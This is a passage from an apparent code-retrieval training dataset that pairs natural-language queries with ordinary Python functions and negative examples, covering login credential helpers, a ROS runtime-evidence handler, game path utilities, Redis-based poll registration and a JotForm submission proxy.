"def extractCredentials(self, request):\n creds={}\n identity=request.form.get(\"__ac_identity_url\", \"\").strip()\n if identity != \"\":\n self.initiateChallenge(identity)\n return creds\n\n self.extractOpenIdServerResponse(request, creds)\n return creds",
"def get_login_info(self):\n username = raw_input(\"Username: \")\n password = getpass.getpass(\"Password:\")\n return (username, password)",
"def _get_credentials(self):\n cred = {\n 'username': self.username,\n 'password': self.password,\n 'host': self.host,\n 'port': self.port,\n }\n return cred",
"def _get_auth_tokens(self):\n _LOGGER.info(\"Retrieving tp-link auth tokens...\")\n\n url_login = 'http://{}/'.format(self.host)\n Y_passwd = '{}'.format(self.password)\n En_passwd = Encrypt(passwd=Y_passwd).encrypt_passwd()\n post_data = {'login': {'password': En_passwd}, 'method': 'do'}\n get_Text = requests.post(url=url_login, json=post_data).text\n get_data = json.loads(get_Text)\n\n if 'stok' not in get_data.keys():\n _LOGGER.error(\"路由器登陆失败,很肯能密码错误\")\n else:\n self.stok = get_data['stok']",
"def authenticate(self):\n logging.info(\"User ID: %s.\", self.user_id)\n\n logging.info(\"Loading game page on VK.com…\")\n app_page = self.session.get(\n \"https://vk.com/app3644106_{}\".format(self.user_id), cookies=self.cookies, timeout=15).text\n\n # Look for params variable in the script.\n match = re.search(r\"var params\\s?=\\s?(\\{[^\\}]+\\})\", app_page)\n if not match:\n raise ValueError(\"params not found\")\n params = json.loads(match.group(1))\n logging.debug(\"Found params: %s\", params)\n\n # Load the proxy page and look for Epic War authentication token.\n logging.info(\"Authenticating in Epic War…\")\n iframe_new = self.session.get(\n \"https://i-epicwar-vk.progrestar.net/iframe/vkontakte/iframe.new.php\",\n params=params,\n timeout=10,\n ).text\n match = re.search(r\"auth_key=([a-zA-Z0-9.\\-]+)\", iframe_new)\n if not match:\n raise ValueError(\"authentication key is not found: %s\" % iframe_new)\n self.auth_token = match.group(1)\n logging.debug(\"Authentication token: %s\", self.auth_token)",
"def login(self):\n\n formdata = {\"username\": self.username, \"password\": self.password}\n r = requests.get(os.path.join(self.toon_url, 'login'), params=formdata)\n self.sessiondata = r.json()",
"def get_credentials():\n username = os.environ.get('USER')\n password = os.environ.get('URS_PWORD')\n # Most machines do set USER, but URS_PWORD is suitably obscure\n if username is None or password is None:\n username = input(\"URS Username: \")\n password = getpass.getpass(\"URS Password: \")\n\n return username, password",
"def extractCredentials( self, request ):\n if not request._auth or not request._auth.startswith(self.auth_scheme):\n return None\n \n ticket = request._auth[len(self.auth_scheme)+1:]\n\n creds = {}\n creds['ticket'] = ticket\n creds['plugin'] = self.getId()\n\n return creds"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Handles the event that a new rte list has been published. If there is an rte with type 'unknown', further processing is canceled, as the rte monitor does not yet deliver usable values.
|
def __delegate_rte_list_received(self, rte_list):
received_rte_list = list(rte_list.runtimeEvidences)
# rte monitor cannot provide usable values, yet.
if any((rte.type == 'unknown' or rte.type == 'omission') for rte in received_rte_list):
if debug_mode:
rospy.loginfo('There is a rte with an unknown type.')
return
runtime_evidences_are_equal = self.received_rte_are_equal(received_rte_list)
if not runtime_evidences_are_equal:
# update current rte list
self.__current_runtime_evidences = received_rte_list
# delay message publishing
# --> assure that the vehicle icons are updated in the CARLA client before the simulation is paused
# (without also updating the timegap setpoint before the Consert Tree in the unity component is evaluated)
# --> assure that the unity component animation is delayed, so that the animation starts at the same time the simulation gets paused
sleep(0.25)
# publish topic to pause simulation
#rospy.loginfo('ChangedSimulationState is set to false')
changed_simulation_state = ChangedSimulationState()
changed_simulation_state.simulationIsRunning = False
self.__change_simulation_state_publisher.publish(changed_simulation_state)
# publish topic with updated rte list
updated_rte_list = RtEList()
#rospy.loginfo('Updated rte list is published')
updated_rte_list.runtimeEvidences = tuple(self.__current_runtime_evidences)
self.__updated_runtime_evidence_list_publisher.publish(updated_rte_list)
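The handler above delegates the change check to received_rte_are_equal, which is not shown here. Below is a minimal sketch of how such a comparison could look inside the same class, assuming the evidences are compared element by element; only the type attribute appears in the handler above, so comparing a value attribute as well is an assumption, as is the requirement that __current_runtime_evidences is initialised to an empty list in __init__.

def received_rte_are_equal(self, received_rte_list):
    # A different number of runtime evidences always counts as a change.
    if len(received_rte_list) != len(self.__current_runtime_evidences):
        return False
    # Element-wise comparison; the attribute set (type, value) is an assumption.
    return all(
        new.type == old.type and getattr(new, 'value', None) == getattr(old, 'value', None)
        for new, old in zip(received_rte_list, self.__current_runtime_evidences)
    )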
|
[
"async def checkNew(self):\n if self.source:\n items = self.source.getRecent()\n items.reverse()\n if items:\n for item in items:\n if item.title not in self.cache:\n logger.info(f'New entry from {str(self.source)}: {item.title}')\n self.cache.append(item.title)\n for itemList in self.list:\n if item.title == itemList['title'] or item.title == itemList['title_english']:\n if itemList['mal_id'] not in self.ignore:\n await self.sendPing(item.title, item.progress, item.link, itemList['image_url'])\n else:\n logger.error(f'Failed retrieving from {str(self.source)}')\n else:\n logger.error(\"Cannot check for new entries, source is not set\")",
"def notify(self, nlist: 'SoNotList') -> \"void\":\n return _coin.SoField_notify(self, nlist)",
"def _DeviceListedEventHandler(self, event):\n self._HandleKeysLeft()\n if self.atft_manager.atfa_dev:\n atfa_message = str(self.atft_manager.atfa_dev)\n else:\n atfa_message = self.ALERT_NO_DEVICE\n\n if self.auto_prov and not self.atft_manager.atfa_dev:\n # If ATFA unplugged during auto mode,\n # exit the mode with an alert.\n self.toolbar.ToggleTool(self.ID_TOOL_PROVISION, False)\n self.OnToggleAutoProv(None)\n self._SendAlertEvent(self.ALERT_ATFA_UNPLUG)\n\n # If in auto provisioning mode, handle the newly added devices.\n if self.auto_prov:\n self._HandleAutoProv()\n\n self.PrintToWindow(self.atfa_devs_output, atfa_message)\n if self.last_target_list == self.atft_manager.target_devs:\n # Nothing changes, no need to refresh\n return\n\n # Update the stored target list. Need to make a deep copy instead of copying\n # the reference.\n self.last_target_list = self._CopyList(self.atft_manager.target_devs)\n self.target_devs_output.DeleteAllItems()\n for target_dev in self.atft_manager.target_devs:\n provision_status_string = ProvisionStatus.ToString(\n target_dev.provision_status, self.GetLanguageIndex())\n # This is a utf-8 string, need to transfer to unicode.\n provision_status_string = provision_status_string.decode('utf-8')\n self.target_devs_output.Append(\n (target_dev.serial_number, target_dev.location,\n provision_status_string))",
"def republish_done(self, dryrun=False):\n pass",
"def notify(self, l: 'SoNotList') -> \"void\":\n return _coin.SoAuditorList_notify(self, l)",
"def handle_poll_event(self, event):\n pass",
"def handle_list_alerts(self, message):\n if self.neon_in_request(message):\n user = self.get_utterance_user(message)\n user_alerts = self._get_alerts_for_user(user)\n if message.data.get(\"alarm\"):\n kind = 'alarm'\n elif message.data.get('timer'):\n kind = 'timer'\n elif message.data.get('reminder') or message.data.get('event'):\n kind = 'reminder'\n else:\n kind = 'alert'\n combined = user_alerts.get(\"alarm\", list())\n combined.extend(user_alerts.get(\"timer\"))\n combined.extend(user_alerts.get(\"reminder\"))\n combined.sort()\n user_alerts[kind] = combined\n alerts_list = user_alerts.get(kind)\n\n LOG.info(f\"alerts_list: {alerts_list}\")\n if not alerts_list:\n self.speak_dialog(\"NoUpcoming\", {\"kind\": kind}, private=True)\n\n else:\n # days, times, names, files, repeats = self.get_speak_time(alerts_list, single=False)\n self.speak_dialog(\"UpcomingType\", {'kind': kind}, private=True)\n for alert in alerts_list:\n data = self._get_speak_data_from_alert(alert)\n if data[\"repeat\"]:\n self.speak_dialog(\"ListRepeatingAlerts\", data, private=True)\n else:\n self.speak_dialog(\"ListAlerts\", data, private=True)",
"def notify(self, l: 'SoNotList') -> \"void\":\n return _coin.SoFieldContainer_notify(self, l)",
"def on_publish(self, unused_client, unused_userdata, unused_mid):\n self.print_debug('Published message acked.')",
"def notify(self, list: 'SoNotList') -> \"void\":\n return _coin.SoVRMLTimeSensor_notify(self, list)",
"def publish(nodeIdentifier, items, requestor):",
"def subscribe_to_objects(self):\n # define subscription interests\n interests = {\n \"epmMacEp\":{\"callback\": self.handle_epmMacEp}, \n \"epmIpEp\":{\"callback\": self.handle_epmIpEp},\n \"epmRsMacEpToIpEpAtt\":{\"callback\":self.handle_epmRsMacEpToIpEpAtt},\n \"fabricProtPol\":{\"callback\":self.handle_fabricProtPol},\n \"fabricExplicitGEp\":{\"callback\":self.handle_fabricExplicitGEp},\n \"vpcRsVpcConf\":{\"callback\":self.handle_vpcRsVpcConf},\n \"fabricNode\":{\"callback\": self.handle_fabricNode},\n \"fvCtx\": {\"callback\": self.handle_name_event},\n \"fvBD\": {\"callback\": self.handle_name_event},\n \"fvSvcBD\": {\"callback\": self.handle_name_event},\n \"fvEPg\": {\"callback\": self.handle_name_event},\n \"fvRsBd\": {\"callback\": self.handle_name_event},\n \"vnsRsEPpInfoToBD\": {\"callback\": self.handle_name_event},\n \"l3extExtEncapAllocator\": {\"callback\": self.handle_name_event},\n \"fvSubnet\": {\"callback\": self.handle_subnet_event},\n \"fvIpAttr\": {\"callback\": self.handle_subnet_event},\n }\n try:\n while 1:\n # start worker processes\n self.start_workers()\n \n # enqueue initial rebuild jobs created from stage_ep_history_db\n while len(self.rebuild_jobs)>0:\n self.enqueue_job(self.rebuild_jobs.pop(0))\n\n # override max_key_count if trust_subscription is disabled\n if not self.trust_subscription:\n self.max_key_count = 64\n\n # start subscriptions\n ept_utils.add_fabric_event(self.fabric, \"Running\", \"\")\n rc = ept_utils.subscribe(self.fabric, interests=interests, \n checker=check_apic_health, \n controller=self.control_subscription,\n controller_interval=self.controller_interval)\n # restart subscription if we see a stateful subscription close\n if rc == ept_utils.RC_SUBSCRIPTION_CLOSE:\n self.stop_workers(delay=0.1)\n logger.warn(\"received subscripton close, re-subscribe\")\n ept_utils.add_fabric_event(self.fabric, \"Re-initializing\",\n \"Restarting subscription\")\n continue\n elif rc == ept_utils.RC_SUBSCRIPTION_FAIL:\n logger.warn(\"received subscription fail\")\n ept_utils.add_fabric_event(self.fabric, \"Restarting\",\n \"APIC subscription failed\")\n else:\n logger.warn(\"unexpected subscription rc: %s\" % rc)\n break\n finally:\n # if subscriptions unexpectedly close, stop workers\n logger.debug(\"subscription unexpectedly ended\")\n self.stop_workers(delay=0.1)",
"def new_list(self):\r\n self.app.clear_data()\r\n self.populate_listbox(self.app.data)\r\n self.set_infobox_msg(\"New list created.\")",
"def on_publish(self, unused_client, unused_userdata, unused_mid):\n print('Published message - ACK received')",
"def publish():\n print(\"Publishing Thread\")\n client = start_client(PUBLISH_CLIENT_ID)\n while publishing:\n illuminance = read_light_sensor()\n temp, hum = read_temperature_humidity()\n readings = {\n 'pi1_timestamp': datetime.now().isoformat(),\n 'illuminance': read_light_sensor(),\n 'temperature': temp,\n 'humidity': hum,\n 'raspberry_pi': 1\n }\n client.publish(TOPIC, json.dumps(readings))\n print('Published readings: ', readings)\n client.loop(.1)\n time.sleep(10)\n print('Stop publishing.')",
"def handle_watch_stale(self, msg):\n key = \"%s,%s,%s,%s\" % (msg.fabric, msg.vnid, msg.addr, msg.node)\n uptime_delta = msg.wf.get_uptime_delta_offset(TRANSITORY_UPTIME)\n if msg.event[\"expected_remote\"] == 0:\n msg.xts = msg.now + TRANSITORY_STALE_NO_LOCAL + uptime_delta\n else:\n msg.xts = msg.now + TRANSITORY_STALE + uptime_delta\n with self.watch_stale_lock:\n self.watch_stale[key] = msg\n logger.debug(\"watch stale added with xts: %.03f, delta: %.03f\", msg.xts, msg.xts-msg.now)",
"def lists_callback(self, dent_type, data, account):\n if dent_type == \"home_avatar\":\n self.update_timeline_avatar(data)\n elif dent_type == \"end\":\n curtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n self.time_updated_action.setText(\"<b>Last updated on: {0}</b>\".format(curtime))\n \n # Notifications\n if self._new_direct_messages > 0:\n notify = pynotify.Notification(\"QTDenter\", \"{0} new dents arrived.\".format(self._new_direct_messages), self.icon[\"path\"])\n notify.set_urgency(pynotify.URGENCY_NORMAL)\n notify.set_timeout(10000)\n notify.add_action(\"clicked\",\"Show QTDenter\", self.show_window, None)\n notify.show()\n self._new_direct_messages = 0\n else:\n self.add_to_timeline_iterator(data, account, dent_type)",
"def notify(self, nl: 'SoNotList') -> \"void\":\n return _coin.SoLOD_notify(self, nl)",
"def notify(self, l: 'SoNotList') -> \"void\":\n return _coin.SoDataSensor_notify(self, l)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Creates a relative path starting from the game_path.
|
def abs_path_to_game_path_rel(game_path, abs_path):
if not game_path or not abs_path:
return None
rel_path = None
i = abs_path.find(game_path)
if i != -1 and i == 0:
rel_path = abs_path[len(game_path):]
return rel_path
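A quick usage sketch of the helper above; the paths are made up purely for illustration.

game_dir = "C:/Games/MyGame/"
texture = "C:/Games/MyGame/assets/textures/wall.png"
print(abs_path_to_game_path_rel(game_dir, texture))              # -> assets/textures/wall.png
print(abs_path_to_game_path_rel(game_dir, "D:/other/wall.png"))  # -> None, not under game_path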
|
[
"def rel_to_abs(path):\r\n current_dir = os.path.abspath(os.path.dirname(__file__))\r\n return os.path.join(current_dir, path)",
"def makefullpath(path):\n try:\n os.makedirs(os.path.split(path)[0])\n except:\n pass",
"def get_full_path(relative_path, package=\"chemper\"):\n if os.path.exists(relative_path):\n return os.path.abspath(relative_path)\n return get_data_path(relative_path, package)",
"def _relative_path(path: Path, relative_to: Path) -> str:\n\n parents = 0\n\n while True:\n try:\n return \"\".join([\"../\"] * parents\n ) + str(path.relative_to(relative_to))\n except Exception:\n parents += 1\n relative_to = relative_to.parent",
"def add_path_to_project_root_str(path: str) -> Path:\n project_root = get_project_root()\n full_path = project_root / path\n return full_path",
"def makeFilePath(self, file_path):\n return '%s/%s' % (os.path.dirname(__file__), file_path)",
"def get_real_path(self):\n return os.path.join(self.root.path, self.path, self.filename)",
"def abs_slash(self):\n p = os.path.abspath(self)\n if not p.endswith('/'):\n return p + '/'\n return p",
"def to_absolute_path(path: str, from_library: Optional[bpy.types.Library] = None) -> str:\n return os.path.normpath(bpy.path.abspath(path, start=get_fp(), library=from_library))",
"def getAbsPath() -> str:\n thisFile:str = os.path.realpath(__file__)\n absPath:str = thisFile.replace(\"/srcTemplates.py\",\"\")\n return absPath",
"def _GetSrcRelativePath(path):\n assert path.startswith(_GetToolsParentDir())\n return expand_owners.SRC + path[len(_GetToolsParentDir()) + 1:]",
"def relativePath(self):\n path = os.getcwd()\n try:\n relative_path = build_root_relative_path(path)\n except BuildRootMissingException as bre:\n PRINT.info(\n f\"ERROR: BUILD_ROOT and current execution path ({path}) not consistent! {str(bre)}\"\n )\n sys.exit(-1)\n DEBUG.debug(\"Relative path: %s\", relative_path)\n return relative_path",
"def subject_relative_path(path):\n directory = path\n subject = component_name(path)\n\n filename = os.path.basename(path)\n directory = os.path.dirname(path)\n parent = os.path.basename(directory)\n\n if re.match(r\"index(?:[-._](?:spec|unit|test|acceptance))?\\.jsx?$\", filename):\n if re.match(r\"__tests?__/?\", parent):\n return '..' + os.sep\n return '.' + os.sep\n\n if re.match(r\"__tests?__/?\", parent):\n return '..' + os.sep\n\n return os.path.join('.', subject)",
"def get_project_path(project_name: str) -> Path:\n return Path(__file__).parent / (\"assets/%s/%s.flxproj\" % (project_name, project_name))",
"def path_on_server(self):\n\n # change dev_base if necessary\n if ConfigHandler.cfg.wb_new == \"True\":\n oPB.DEV_BASE = oPB.DEV_BASE_OPSI41\n else:\n oPB.DEV_BASE = oPB.DEV_BASE_OPSI40\n\n # if on Linux, we have to subtract local share base from development folder\n # -> the local share base acts like the drive letter on windows\n if platform.system() == 'Linux':\n tmp = self.projectfolder.replace(ConfigHandler.cfg.local_share_base, \"\")\n else:\n tmp = self.projectfolder\n\n if platform.system() == \"Windows\":\n # remove drive letter\n return oPB.DEV_BASE + tmp[2:].replace(\"\\\\\", \"/\")\n else:\n # replace possible double '/' with single '/'\n return (oPB.DEV_BASE + \"/\" + tmp).replace(\"//\", \"/\")\n\n \"\"\"\n if tmp.startswith(repo_base):\n return tmp\n else:\n if tmp.strip() != \"\":\n ret = (repo_base + \"/\" + tmp + \"/\" + self.id).replace(\"//\", \"/\")\n print(\"a\", ret)\n return ret\n else:\n ret = (repo_base + \"/\" + self.id).replace(\"//\", \"/\")\n print(\"b\", ret)\n return ret\n \"\"\"",
"def make_path(file_name):\n return os.path.abspath(os.path.join(output_directory,\n file_name))",
"def to_filesystem_path(self, wspath):\n if wspath.startswith('/'):\n project_name,*rest = wspath[1:].split('/', 1)\n project_loc = self.get_project_location(project_name)\n if not os.path.isdir(project_loc):\n raise RuntimeError(\"Directory for project {} doesn't exist (workspace dir not specified?): {}\".format(project_name, project_loc))\n return os.path.join(project_loc, *rest)\n else:\n return wspath # part is relative to current working directory",
"def relPath(self):\n return os.path.join(self.relLoc, self.fileName)",
"def _get_source_directory(self):\n base_dir = os.getcwd() + '/'\n logger.debug('Base dir: %s' % base_dir)\n logger.debug('Game parameter: %s' % self.game)\n if self.game == '':\n return base_dir\n\n base_dir += self.game\n logger.debug('Game directory: %s' % base_dir)\n if os.path.exists(base_dir) is False:\n logger.critical('Invalid game: %s' % self.game)\n sys.exit(128)\n\n return base_dir"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Register the User/Poll Pair. Register the User/Poll pair and assign them a UUID that can be used to identify them in subsequent requests.
|
async def register_poll(user_credentials: JotFormCredentials):
app_key, poll_id = user_credentials.appKey, user_credentials.pollID
if possible_uuid := redis.get(f"{app_key}-{poll_id}"):
return {"uuid": possible_uuid} # If the user is already registered
# Do not re-register them.
user_uuid = uuid4().hex # Otherwise, Generate a unique user ID.
# Save user credentials.
redis.set(user_uuid, f"{app_key}-{poll_id}")
# We also set the reverse as we want to reuse the UUIDs.
redis.set(f"{app_key}-{poll_id}", user_uuid)
return {"uuid": user_uuid}
|
[
"def register_user(self, user_info) -> Dict:\n raise NotImplementedError",
"def register(self, nickname, passwordHash):\n # Checks in the DB that the nickname was not already used. If ok, create\n # the player in the DB.\n if self.playersColl.find_one({'nickname': nickname}) == None:\n # creates the players in the DB\n playerID = self.playersColl.insert_one({'nickname': nickname, \n 'passwordHash': passwordHash, \n 'totalScore': 0, 'gameID': None}).inserted_id\n result = {'status': \"ok\", 'nickname': nickname, 'playerID': playerID }\n else:\n result = {'status': \"ko\", 'reason': \"invalid nickname\"}\n return result",
"def register(ctx, username, password):\n url = ctx.obj['URLS'].register_user()\n headers = ctx.obj['HEADERS']\n data = {\n 'username': username,\n 'password': password,\n 'verify': False\n }\n try:\n r = requests.post(url, json=data, headers=headers)\n r.raise_for_status()\n body = r.json()\n if ctx.obj['RAW']:\n click.echo(json.dumps(body, indent=4))\n else:\n user_id = body['id']\n user_name = body['username']\n click.echo('Registered {} with ID {}.'.format(user_name, user_id))\n except (requests.ConnectionError, requests.HTTPError) as ex:\n click.echo('{}'.format(ex))",
"def create_user(self):\n sid = \"#{}\".format(uuid.uuid4()) # the public facing session ID\n uid = \"#{}\".format(uuid.uuid4()) # the private user ID\n user = User(uid)\n\n self.users[uid] = user\n self.sid_to_uid[sid] = [uid, int(time.time())]\n return sid",
"def register(self) -> None:\n # Used for creating account. Submit to /create_account endpoint\n username = input(\"Enter your username. \" +\n \"This will be used to log in to the web service.\\n\")\n email = input(\"Enter your email. \" +\n \"This will be used as your GNUPG username.\\n\")\n password = getpass(\"Enter your password. \" +\n \"This will be used as your GNUPG passphrase.\\n\")\n headers = {\n \"accept\": \"application/json\",\n \"Content-Type\": \"application/json\"\n }\n payload = {\n \"username\": username,\n \"email\": email,\n \"password\": password\n }\n response = requests.post(f\"{self.BASE_URL}/register\", json=payload,\n headers=headers)\n\n self.gpg_service.create_key(passphrase=password, email=email)\n\n if response.status_code == 200:\n print(\"Account created.\\nAttempting to log in...\")\n self.login(username, password)\n\n else:\n print(\"There was a problem creating your account.\")",
"def register():\n\n data = collect_data()\n\n log.debug('data is: {0}'.format(json.dumps(data, default=lambda o: o.__dict__)))\n api_submit('/api/register', data, method='put')",
"def register():\n username = request.form['username']\n address = request.form['server_address']\n\n if not servers.exists(address=address):\n return bad_json_response('Server is not registered.')\n\n server_id = servers.export_one('id', address=address)\n\n if ping(address):\n if not users.exists(username=username):\n users.insert(username=username, server_id=server_id)\n else:\n return bad_json_response(\n 'Username is already taken. Try again :).')\n else:\n return bad_json_response(\n 'This data server is not available. '\n 'Please contact the server owner.'\n )\n\n return good_json_response('success')",
"def register_secret_key():\n require_parameters({'AWSAccessKeyId', 'AWSSecretKey'})\n found_user = USERS.get(get('AWSAccessKeyId'))\n if found_user is None:\n USERS.create(\n apikey=get('AWSAccessKeyId'),\n secretkey=get('AWSSecretKey')\n )\n return {\n 'template_name_or_list': 'secretkey.xml',\n 'response_type': 'RegisterSecretKeyResponse',\n 'AWSAccessKeyId': get('AWSAccessKeyId'),\n 'AWSSecretKey': get('AWSSecretKey'),\n 'Message': 'Successfully Registered!'\n }\n else:\n raise Ec2stackError(\n '400',\n 'DuplicateUser',\n 'The given AWSAccessKeyId is already registered'\n )",
"def signup():\n\n global active_user\n req = request.get_json(force=True, silent=True)\n username = req.get('username')\n password = req.get('password')\n # print(user, password)\n try:\n user = User.get(user_id=username)\n if not user:\n print('i was here')\n # create_user(userid = user, password = password)\n User(user_id=username, password=password)\n active_user = username\n return \"SUCESSS, Your ID is created\"\n else:\n return \"FALIURE, Your ID was already taken\"\n except Exception as e:\n return str(e)",
"def register(self, new_user: str, new_ip: str):\n\t\tself.__user[new_user] = new_ip\n\t\tself.__ip[new_ip] = new_user",
"def register(self, request, **kwargs):\n username, email = kwargs['username'], kwargs['email']\n new_user = User.objects.create_user(username, email)\n new_user.password = User.objects.set_unusable_password()\n new_user.save()\n\n new_twitter_profile = TwitterProfile(\n user=new_user,\n twitter_id=request.session.get('twitter_id', None),\n )\n new_twitter_profile.access_token = request.session.get('access_token', None) or new_twitter_profile.access_token\n new_twitter_profile.save()\n\n signals.user_registered.send(sender=self.__class__, user=new_user, request=request)\n return new_user",
"def add_user_pair(user1, user2):\n max_query = \"SELECT MAX(id) FROM UserPair\"\n user1_id = get_user_id(user1)\n user2_id = get_user_id(user2)\n\n query = \"\"\"\n INSERT OR IGNORE INTO UserPair\n (id, user1, user2) \n VALUES\n (?, ?, ?)\n \"\"\"\n\n db = get_db()\n cur = db.cursor()\n cur.execute(max_query)\n result = cur.fetchone()[0]\n if not result:\n new_id = 1\n else:\n new_id = int(result) + 1\n\n cur.execute(query, (new_id, user1_id, user2_id))\n #cur.execute(query, (new_id, user2_id, user1_id))\n\n db.commit()\n\n return new_id",
"def pair(self):\n device_public_key = self.get_value(\"DevicePublicKey\", no_session=True)\n if not device_public_key:\n raise MuxError(\"Unable to retrieve DevicePublicKey\")\n buid = self._usbmux.read_system_BUID()\n wifi_address = self.get_value(\"WiFiAddress\", no_session=True)\n\n try:\n from ._ssl import make_certs_and_key\n except ImportError:\n #print(\"DevicePair require pyOpenSSL and pyans1, install by the following command\")\n #print(\"\\tpip3 install pyOpenSSL pyasn1\", flush=True)\n raise RuntimeError(\"DevicePair required lib, fix with: pip3 install pyOpenSSL pyasn1\")\n\n cert_pem, priv_key_pem, dev_cert_pem = make_certs_and_key(device_public_key)\n pair_record = {\n 'DevicePublicKey': device_public_key,\n 'DeviceCertificate': dev_cert_pem,\n 'HostCertificate': cert_pem,\n 'HostID': str(uuid.uuid4()).upper(),\n 'RootCertificate': cert_pem,\n 'SystemBUID': buid,\n }\n\n with self.create_inner_connection() as s:\n ret = s.send_recv_packet({\n \"Request\": \"Pair\",\n \"PairRecord\": pair_record,\n \"Label\": PROGRAM_NAME,\n \"ProtocolVersion\": \"2\",\n \"PairingOptions\": {\n \"ExtendedPairingErrors\": True,\n }\n })\n assert ret, \"Pair request got empty response\"\n if \"Error\" in ret:\n # error could be \"PasswordProtected\" or \"PairingDialogResponsePending\"\n raise MuxError(\"pair:\", ret['Error'])\n\n assert 'EscrowBag' in ret, ret\n pair_record['HostPrivateKey'] = priv_key_pem\n pair_record['EscrowBag'] = ret['EscrowBag']\n pair_record['WiFiMACAddress'] = wifi_address\n \n self.usbmux.send_recv({\n \"MessageType\": \"SavePairRecord\",\n \"PairRecordID\": self.udid,\n \"PairRecordData\": bplist.dumps(pair_record),\n \"DeviceID\": self.devid,\n })\n return pair_record",
"async def register(websocket):\n USERS.add(websocket)\n logger.info('New client connected')\n await send_state_data()",
"def register_user(url, payload):\n resp = requests.post(url, data=payload)\n resp_obj = {\n 'resp_obj': resp,\n 'resp_data': resp.json()\n }\n return resp_obj",
"def register_pi():\n global video_village_pi_id\n result = requests.post(VILLAGE_REGISTER_ENDPOINT,\n headers=VILLAGE_REQUEST_HEADERS,\n json={'mac_address': PI_HARDWARE_ADDRESS})\n if result.status_code == 200:\n registration_info = result.json()\n video_village_pi_id = registration_info.get('id')\n return True\n\n return False",
"def _create_registration(self, user):\n salt = sha_constructor(str(random.random())).hexdigest()[:5]\n activation_key = sha_constructor(salt + user.username).hexdigest()\n return self.create(user=user,\n activation_key=activation_key)",
"def associate_auth(self, user, uid, response, details):\n extra_data = '' if not getattr(settings, 'SOCIAL_AUTH_EXTRA_DATA',\n False) \\\n else self.extra_data(user, uid, response, details)\n return UserSocialAuth.objects.create(user=user, uid=uid,\n provider=self.name,\n extra_data=extra_data)",
"def register(self):\n app = App.get_running_app()\n\n try:\n app.backend.register(self.ids.email.text, self.ids.password.text)\n Alert(title=\"Register Success\", text=\"Your account is successfully created.\")\n\n except BackEndError as e:\n Alert(title=\"Register Error\", text=e.error)\n except Exception as e:\n Alert(title=\"Register Error\", text=\"Unexpected error: \" + str(e))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Proxy form submission requests. Proxy the form submission requests to the JotForm API and return the responses verbatim. For more information on request and response formats,
|
async def proxy_submit_submission(uuid: str, submission: list[dict[str, Union[dict, list]]]):
credentials = redis.get(uuid)
if credentials is None:
raise HTTPError(401, "Unauthorised request")
app_key, poll_id = credentials.decode("utf-8").split("-") # Get back our credentials.
reply = put(f"https://api.jotform.com/form/" +
f"{poll_id}/submissions?apiKey={app_key}",
json=submission)
return Response(content=reply.content,
media_type=getattr(reply,"media_type", "application/json"))
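The split("-") above assumes the Redis value was stored as a single "appKey-formID" string when the user first authorised the app; that storage step is not shown in this snippet. A minimal sketch of how it might look (the helper name, connection, and TTL are illustrative assumptions, not taken from the source):

import uuid as uuid_lib

import redis as redis_lib

redis = redis_lib.Redis()  # assumed connection; the handler above only shows redis.get(uuid)


def store_credentials(app_key: str, poll_id: str, ttl_seconds: int = 3600) -> str:
    # Hypothetical helper: cache the JotForm credentials under a fresh UUID in the
    # "appKey-pollId" shape that proxy_submit_submission later splits on "-".
    # Assumes neither value contains a dash.
    session_id = str(uuid_lib.uuid4())
    redis.set(session_id, f"{app_key}-{poll_id}", ex=ttl_seconds)
    return session_id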
|
[
"async def process_post(self, form: dict) -> str:\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent.process_post: >>> form: {}'.format(form))\n\n validate_form(form, self.cfg.get('proxy-relay', False))\n\n if form['type'] == 'agent-nym-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_nym(form['data']['agent-nym']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_endpoint(form['data']['agent-endpoint']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-send':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n resp_json = await self.send_endpoint()\n rv = json.dumps({})\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'schema-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n s_key = schema_key_for(form['data']['schema'])\n schema_json = await self.get_schema(s_key)\n schema = json.loads(schema_json)\n if not schema:\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] in (\n 'agent-nym-send',\n 'schema-send',\n 'claim-def-send',\n 'claim-offer-create',\n 'claim-offer-store',\n 'claim-create',\n 'claim-store',\n 'claim-request',\n 'proof-request',\n 'proof-request-by-referent',\n 'verification-request'): # do not proxy: master-secret-set, claims-reset\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n # base listening agent doesn't do this work\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not respond to token type {}'.format(self.__class__.__name__, form['type']))\n\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not support token type {}'.format(self.__class__.__name__, form['type']))",
